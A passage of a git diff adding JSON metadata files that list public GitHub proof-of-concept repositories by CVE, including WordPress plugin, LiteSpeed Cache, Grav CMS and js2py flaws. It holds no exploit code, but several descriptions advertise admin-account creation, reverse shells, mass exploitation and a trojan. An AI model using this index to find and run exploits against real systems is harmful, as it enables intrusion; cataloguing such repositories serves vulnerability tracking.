"id": 800537570, + "name": "WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956", + "full_name": "AiGptCode\/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956", + "owner": { + "login": "AiGptCode", + "id": 146197697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146197697?v=4", + "html_url": "https:\/\/github.com\/AiGptCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AiGptCode\/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956", + "description": "WordPress Auto Admin Account Creation and Reverse Shell cve-2024-27956 automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries", + "fork": false, + "created_at": "2024-05-14T14:21:49Z", + "updated_at": "2025-01-01T10:07:35Z", + "pushed_at": "2024-07-01T09:29:02Z", + "stargazers_count": 97, + "watchers_count": 97, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "backdoor", + "backdoors", + "cve", + "exploit", + "hack", + "hacking", + "html", + "nuclei", + "nuclei-templates", + "php", + "ransomware", + "rce", + "reverse-shell", + "shell", + "website", + "windows", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 24, + "watchers": 97, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 800894301, + "name": "CVE-2024-27956-RCE-File-Package", + "full_name": "W3BW\/CVE-2024-27956-RCE-File-Package", + "owner": { + "login": "W3BW", + "id": 169884248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169884248?v=4", + "html_url": "https:\/\/github.com\/W3BW", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W3BW\/CVE-2024-27956-RCE-File-Package", + "description": null, + "fork": false, + "created_at": "2024-05-15T07:48:54Z", + "updated_at": "2024-05-15T08:11:52Z", + "pushed_at": "2024-05-15T08:11:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811676044, + "name": "CVE-2024-27956", + "full_name": "Cappricio-Securities\/CVE-2024-27956", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-27956", + "description": "WordPress Automatic Plugin <= 3.92.0 - SQL Injection", + "fork": false, + "created_at": "2024-06-07T04:40:06Z", + "updated_at": "2024-06-27T14:25:23Z", + "pushed_at": "2024-06-24T10:43:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-27956", + "cve-2024-27956-exploit", + "cve-2024-27956-poc", + "cve-2024-27956-scanner", + "sql-injection", + "sqli", + "wordpress", + "wp-scan", + "wp-sqli" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 812538942, + "name": "MASS-CVE-2024-27956", + "full_name": "itzheartzz\/MASS-CVE-2024-27956", + "owner": { + "login": "itzheartzz", + "id": 172171370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172171370?v=4", + "html_url": "https:\/\/github.com\/itzheartzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itzheartzz\/MASS-CVE-2024-27956", + "description": null, + "fork": false, + "created_at": "2024-06-09T07:21:44Z", + "updated_at": "2024-10-29T13:50:22Z", + "pushed_at": "2024-06-09T16:37:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814427157, + "name": "Valve-Press-CVE-2024-27956-RCE", + "full_name": "TadashiJei\/Valve-Press-CVE-2024-27956-RCE", + "owner": { + "login": "TadashiJei", + "id": 154245504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154245504?v=4", + "html_url": "https:\/\/github.com\/TadashiJei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TadashiJei\/Valve-Press-CVE-2024-27956-RCE", + "description": "Valve Press - CVE-2024-27956-RCE - SQL Injection", + "fork": false, + "created_at": "2024-06-13T02:05:31Z", + "updated_at": "2024-06-13T02:07:39Z", + "pushed_at": "2024-06-13T02:07:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815017516, + "name": "CVE-2024-27956-RCE", + "full_name": "cve-2024\/CVE-2024-27956-RCE", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-27956-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:13:54Z", + "updated_at": "2024-06-14T07:15:39Z", + "pushed_at": "2024-06-14T07:15:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 827369395, + "name": "CVE-2024-27956", + "full_name": "ThatNotEasy\/CVE-2024-27956", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-27956", + "description": "Perform with massive Wordpress SQLI 2 RCE", + "fork": false, + "created_at": "2024-07-11T14:17:23Z", + "updated_at": "2024-10-30T04:42:06Z", + "pushed_at": "2024-07-11T14:20:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 832540537, + "name": "EXPLOITING-CVE-2024-27956", + "full_name": "CERTologists\/EXPLOITING-CVE-2024-27956", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/EXPLOITING-CVE-2024-27956", + "description": null, + "fork": false, + "created_at": "2024-07-23T08:24:56Z", + "updated_at": "2024-07-23T08:27:15Z", + "pushed_at": "2024-07-23T08:27:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906111399, + "name": "CVE-2024-27956-for-fscan", + "full_name": "7aRanchi\/CVE-2024-27956-for-fscan", + "owner": { + "login": "7aRanchi", + "id": 96373545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96373545?v=4", + "html_url": "https:\/\/github.com\/7aRanchi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7aRanchi\/CVE-2024-27956-for-fscan", + "description": "Yaml PoC rule for fscan.", + "fork": false, + "created_at": "2024-12-20T07:30:24Z", + "updated_at": "2024-12-20T08:09:11Z", + "pushed_at": "2024-12-20T08:09:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27971.json b/2024/CVE-2024-27971.json new file mode 100644 index 0000000000..ee2805b97a --- /dev/null +++ b/2024/CVE-2024-27971.json @@ -0,0 +1,33 @@ +[ + { + "id": 795532767, + "name": "CVE-2024-27971-Note", + "full_name": "truonghuuphuc\/CVE-2024-27971-Note", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27971-Note", + "description": "CVE-2024-27971 WordPress Premmerce Permalink Manager for WooCommerce Plugin <= 2.3.10 is vulnerable to Local File Inclusion", + "fork": false, + "created_at": "2024-05-03T13:38:33Z", + "updated_at": "2024-06-26T12:03:55Z", + "pushed_at": "2024-05-03T14:43:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27972.json b/2024/CVE-2024-27972.json new file mode 100644 index 0000000000..b7f8e1dadc --- /dev/null +++ b/2024/CVE-2024-27972.json @@ -0,0 +1,33 @@ +[ + { + "id": 802518507, + "name": "CVE-2024-27972-Poc", + "full_name": "truonghuuphuc\/CVE-2024-27972-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27972-Poc", + "description": "CVE-2024-27972 WP Fusion Lite <= 3.41.24 - Authenticated (Contributor+) Remote Code Execution", + "fork": false, + "created_at": "2024-05-18T14:17:34Z", + "updated_at": "2024-06-26T12:03:36Z", + "pushed_at": "2024-05-18T14:40:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27983.json b/2024/CVE-2024-27983.json new file mode 100644 index 0000000000..31078b8cba --- /dev/null +++ b/2024/CVE-2024-27983.json @@ -0,0 +1,33 @@ +[ + { + "id": 786410918, + "name": "CVE-2024-27983-nodejs-http2", + "full_name": "lirantal\/CVE-2024-27983-nodejs-http2", + "owner": { + "login": "lirantal", + "id": 316371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/316371?v=4", + "html_url": "https:\/\/github.com\/lirantal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lirantal\/CVE-2024-27983-nodejs-http2", + "description": "CVE-2024-27983 this repository builds up a vulnerable HTTP2 Node.js server (`server-nossl.js`) based on CVE-2024-27983 which exploits a continuation flood vulnerability in HTTP2 servers.", + "fork": false, + "created_at": "2024-04-14T11:34:52Z", + "updated_at": "2024-11-07T02:13:19Z", + "pushed_at": "2024-04-14T11:35:23Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28000.json b/2024/CVE-2024-28000.json new file mode 100644 index 0000000000..27dd0d5d03 --- /dev/null +++ b/2024/CVE-2024-28000.json @@ -0,0 +1,166 @@ +[ + { + "id": 846839815, + "name": "CVE-2024-28000", + "full_name": "Alucard0x1\/CVE-2024-28000", + "owner": { + "login": "Alucard0x1", + "id": 3710918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710918?v=4", + "html_url": "https:\/\/github.com\/Alucard0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alucard0x1\/CVE-2024-28000", + "description": "LiteSpeed Cache Privilege Escalation PoC", + "fork": false, + "created_at": "2024-08-24T05:12:56Z", + "updated_at": "2024-12-10T13:57:44Z", + "pushed_at": "2024-08-25T03:06:56Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847379986, + "name": "CVE-2024-28000", + "full_name": "ebrasha\/CVE-2024-28000", + "owner": { + "login": "ebrasha", + "id": 9009001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9009001?v=4", + "html_url": "https:\/\/github.com\/ebrasha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ebrasha\/CVE-2024-28000", + "description": "LiteSpeed Cache Privilege Escalation PoC - CVE-2024-28000", + "fork": false, + "created_at": "2024-08-25T16:57:24Z", + "updated_at": "2024-09-02T08:37:09Z", + "pushed_at": "2024-09-02T08:08:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abdal", + "cve-2024-28000", + "ebrasha", + "exploit", + "litespeed-cache-privilege", + "poc", + "privilege-escalation-poc", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848127480, + "name": "CVE-2024-28000", + "full_name": "arch1m3d\/CVE-2024-28000", + "owner": { + "login": "arch1m3d", + "id": 179568627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179568627?v=4", + "html_url": "https:\/\/github.com\/arch1m3d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arch1m3d\/CVE-2024-28000", + "description": "PoC for the CVE-2024 Litespeed Cache Privilege Escalation ", + "fork": false, + "created_at": "2024-08-27T07:20:44Z", + "updated_at": "2024-09-11T18:56:34Z", + "pushed_at": "2024-08-30T06:43:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854418896, + "name": "CVE-2024-28000", + "full_name": "SSSSuperX\/CVE-2024-28000", + "owner": { + "login": "SSSSuperX", + "id": 46961265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46961265?v=4", + "html_url": "https:\/\/github.com\/SSSSuperX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SSSSuperX\/CVE-2024-28000", + "description": "CVE-2024-28000 LiteSpeed Cache Privilege Escalation Scan&Exp", + "fork": false, + "created_at": "2024-09-09T06:19:54Z", + "updated_at": "2024-09-09T07:06:51Z", + "pushed_at": "2024-09-09T07:06:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855053349, + "name": "CVE-2024-28000", + "full_name": "JohnDoeAnonITA\/CVE-2024-28000", + "owner": { + "login": "JohnDoeAnonITA", + "id": 162304433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162304433?v=4", + "html_url": "https:\/\/github.com\/JohnDoeAnonITA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JohnDoeAnonITA\/CVE-2024-28000", + "description": "CVE-2024-28000 Exploit for litespeed-cache =<6.3 allows Privilege Escalation with creation of administrator account", + "fork": false, + "created_at": "2024-09-10T08:16:16Z", + "updated_at": "2024-09-13T16:27:27Z", + "pushed_at": "2024-09-11T15:52:39Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28085.json b/2024/CVE-2024-28085.json new file mode 100644 index 0000000000..7d7eff95cf --- /dev/null +++ b/2024/CVE-2024-28085.json @@ -0,0 +1,75 @@ +[ + { + "id": 770117095, + "name": "CVE-2024-28085", + "full_name": "skyler-ferrante\/CVE-2024-28085", + "owner": { + "login": "skyler-ferrante", + "id": 24577503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24577503?v=4", + "html_url": "https:\/\/github.com\/skyler-ferrante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyler-ferrante\/CVE-2024-28085", + "description": "WallEscape vulnerability in util-linux", + "fork": false, + "created_at": "2024-03-11T00:15:03Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-03-30T01:32:02Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "privesc", + "privilege-escalation", + "redteam", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 49, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848156045, + "name": "sleepall", + "full_name": "oditynet\/sleepall", + "owner": { + "login": "oditynet", + "id": 16400007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16400007?v=4", + "html_url": "https:\/\/github.com\/oditynet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oditynet\/sleepall", + "description": "trojan CVE-2024-28085 CVE 28085", + "fork": false, + "created_at": "2024-08-27T08:34:15Z", + "updated_at": "2024-12-02T12:54:19Z", + "pushed_at": "2024-12-02T12:54:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "28085", + "cve", + "trojan" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28088.json b/2024/CVE-2024-28088.json new file mode 100644 index 0000000000..3499cedfd4 --- /dev/null +++ b/2024/CVE-2024-28088.json @@ -0,0 +1,33 @@ +[ + { + "id": 771904991, + "name": "cve-2024-28088-poc", + "full_name": "levpachmanov\/cve-2024-28088-poc", + "owner": { + "login": "levpachmanov", + "id": 31389480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31389480?v=4", + "html_url": "https:\/\/github.com\/levpachmanov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/levpachmanov\/cve-2024-28088-poc", + "description": null, + "fork": false, + "created_at": "2024-03-14T07:02:11Z", + "updated_at": "2024-03-14T07:03:15Z", + "pushed_at": "2024-03-14T07:43:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28116.json b/2024/CVE-2024-28116.json new file mode 100644 index 0000000000..70e2e0b2a3 --- /dev/null +++ b/2024/CVE-2024-28116.json @@ -0,0 +1,105 @@ +[ + { + "id": 776776802, + "name": "Graver", + "full_name": "akabe1\/Graver", + "owner": { + "login": "akabe1", + "id": 46047144, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46047144?v=4", + "html_url": "https:\/\/github.com\/akabe1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akabe1\/Graver", + "description": "Proof of Concept script to exploit the authenticated SSTI+RCE in Grav CMS (CVE-2024-28116)", + "fork": false, + "created_at": "2024-03-24T13:14:52Z", + "updated_at": "2024-11-20T16:30:43Z", + "pushed_at": "2024-03-24T14:49:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 853633561, + "name": "Grav-CMS-RCE-Authenticated", + "full_name": "gunzf0x\/Grav-CMS-RCE-Authenticated", + "owner": { + "login": "gunzf0x", + "id": 31874167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4", + "html_url": "https:\/\/github.com\/gunzf0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gunzf0x\/Grav-CMS-RCE-Authenticated", + "description": "Exploit against Grav CMS (versions below 1.7.45) that allows Remote Code Execution for an authenticated user - CVE-2024-28116", + "fork": false, + "created_at": "2024-09-07T05:00:19Z", + "updated_at": "2024-10-04T22:16:41Z", + "pushed_at": "2024-09-07T05:20:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-28116", + "exploit", + "grav-cms", + "payload", + "rce", + "remote-code-execution", + "server-side-template-injection", + "ssti", + "ssti-payloads" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868072354, + "name": "GenGravSSTIExploit", + "full_name": "geniuszly\/GenGravSSTIExploit", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/GenGravSSTIExploit", + "description": "is a PoC Python script that exploits an authenticated Server-Side Template Injection (SSTI) vulnerability in Grav CMS versions <= 1.7.44 (CVE-2024-28116)", + "fork": false, + "created_at": "2024-10-05T12:05:06Z", + "updated_at": "2024-10-21T08:15:12Z", + "pushed_at": "2024-10-05T12:08:37Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28247.json b/2024/CVE-2024-28247.json new file mode 100644 index 0000000000..e4db4658a0 --- /dev/null +++ b/2024/CVE-2024-28247.json @@ -0,0 +1,33 @@ +[ + { + "id": 780056999, + "name": "CVE-2024-28247-Pi-hole-Arbitrary-File-Read", + "full_name": "T0X1Cx\/CVE-2024-28247-Pi-hole-Arbitrary-File-Read", + "owner": { + "login": "T0X1Cx", + "id": 71453093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71453093?v=4", + "html_url": "https:\/\/github.com\/T0X1Cx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T0X1Cx\/CVE-2024-28247-Pi-hole-Arbitrary-File-Read", + "description": "This repository provides an exploit for CVE-2024-28247, highlighting a vulnerability that permits a remote attacker to read arbitrary files on the system.", + "fork": false, + "created_at": "2024-03-31T15:25:15Z", + "updated_at": "2024-11-20T16:30:43Z", + "pushed_at": "2024-03-31T15:49:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28255.json b/2024/CVE-2024-28255.json new file mode 100644 index 0000000000..cba1592e04 --- /dev/null +++ b/2024/CVE-2024-28255.json @@ -0,0 +1,33 @@ +[ + { + "id": 785532678, + "name": "CVE-2024-28255", + "full_name": "YongYe-Security\/CVE-2024-28255", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2024-28255", + "description": "OpenMetadata_RCE (CVE-2024-28255) Batch scan\/exploit", + "fork": false, + "created_at": "2024-04-12T04:29:58Z", + "updated_at": "2024-11-06T23:16:20Z", + "pushed_at": "2024-04-12T04:41:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28397.json b/2024/CVE-2024-28397.json new file mode 100644 index 0000000000..aea8bec40d --- /dev/null +++ b/2024/CVE-2024-28397.json @@ -0,0 +1,64 @@ +[ + { + "id": 817083025, + "name": "CVE-2024-28397-js2py-Sandbox-Escape", + "full_name": "Marven11\/CVE-2024-28397-js2py-Sandbox-Escape", + "owner": { + "login": "Marven11", + "id": 110723864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110723864?v=4", + "html_url": "https:\/\/github.com\/Marven11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marven11\/CVE-2024-28397-js2py-Sandbox-Escape", + "description": "CVE-2024-28397: js2py sandbox escape, bypass pyimport restriction.", + "fork": false, + "created_at": "2024-06-19T01:46:33Z", + "updated_at": "2024-11-22T01:41:08Z", + "pushed_at": "2024-07-29T04:42:43Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818088894, + "name": "CVE-2024-28397-js2py-Sandbox-Escape", + "full_name": "CYBER-WARRIOR-SEC\/CVE-2024-28397-js2py-Sandbox-Escape", + "owner": { + "login": "CYBER-WARRIOR-SEC", + "id": 168237449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168237449?v=4", + "html_url": "https:\/\/github.com\/CYBER-WARRIOR-SEC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CYBER-WARRIOR-SEC\/CVE-2024-28397-js2py-Sandbox-Escape", + "description": null, + "fork": false, + "created_at": "2024-06-21T04:43:21Z", + "updated_at": "2024-06-29T21:42:12Z", + "pushed_at": "2024-06-29T21:42:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28515.json b/2024/CVE-2024-28515.json new file mode 100644 index 0000000000..d01c610156 --- /dev/null +++ b/2024/CVE-2024-28515.json @@ -0,0 +1,33 @@ +[ + { + "id": 774130695, + "name": "CVE-2024-28515", + "full_name": "heshi906\/CVE-2024-28515", + "owner": { + "login": "heshi906", + "id": 132426770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132426770?v=4", + "html_url": "https:\/\/github.com\/heshi906", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/heshi906\/CVE-2024-28515", + "description": "A vuln about csapp.", + "fork": false, + "created_at": "2024-03-19T01:53:48Z", + "updated_at": "2024-03-23T16:52:04Z", + "pushed_at": "2024-03-30T15:08:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28589.json b/2024/CVE-2024-28589.json new file mode 100644 index 0000000000..0dc0d04f3b --- /dev/null +++ b/2024/CVE-2024-28589.json @@ -0,0 +1,33 @@ +[ + { + "id": 781546021, + "name": "CVE-2024-28589", + "full_name": "Alaatk\/CVE-2024-28589", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-28589", + "description": "Local Privilege Escalation Vulnerability on Axigen for Windows", + "fork": false, + "created_at": "2024-04-03T15:31:02Z", + "updated_at": "2024-04-17T11:47:56Z", + "pushed_at": "2024-04-03T15:38:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28715.json b/2024/CVE-2024-28715.json new file mode 100644 index 0000000000..3d79ee02b1 --- /dev/null +++ b/2024/CVE-2024-28715.json @@ -0,0 +1,33 